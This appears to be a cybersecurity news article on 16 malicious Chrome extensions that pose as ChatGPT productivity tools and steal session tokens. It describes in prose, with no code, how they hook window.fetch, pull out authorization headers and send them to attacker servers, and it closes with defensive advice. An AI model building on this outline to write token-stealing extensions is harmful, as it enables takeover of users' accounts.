Beware: Malicious Chrome Extensions Masquerading as ChatGPT Enhancements
In a recent cybersecurity revelation, researchers have identified a coordinated campaign involving 16 malicious Chrome extensions designed to appear as legitimate productivity tools and ChatGPT enhancement applications. These deceptive extensions are actively stealing ChatGPT session authentication tokens, granting attackers full access to users’ accounts and conversations.
Exploiting the Popularity of AI-Powered Extensions
The surge in AI-powered browser extensions has provided cybercriminals with new avenues to exploit unsuspecting users. By mimicking trusted productivity applications, these malicious extensions successfully infiltrate users’ systems, making it challenging to distinguish between genuine and harmful software.
Technical Mechanism: Session Token Interception
Upon installation, these extensions inject malicious code into web pages where ChatGPT is accessed. They hook into the browser’s core functions, specifically targeting the `window.fetch` function that handles web requests. This allows the malware to monitor all outgoing traffic from ChatGPT’s official website.
When the extension detects requests containing authorization headers—the digital keys that authenticate users to ChatGPT’s servers—it quietly extracts these session tokens. These tokens are then transmitted to attacker-controlled servers, enabling criminals to impersonate users entirely. This grants them access to all ChatGPT conversations, stored data, and connected services like Google Drive, Slack, and GitHub.
Broader Implications and Recommendations
The discovery underscores the increasing sophistication of threat actors targeting AI platform users. Organizations and individuals are advised to exercise caution when installing AI-integrated browser extensions. Implementing extension monitoring technologies and establishing policies to restrict third-party AI tools requiring deep browser integration can mitigate potential risks.
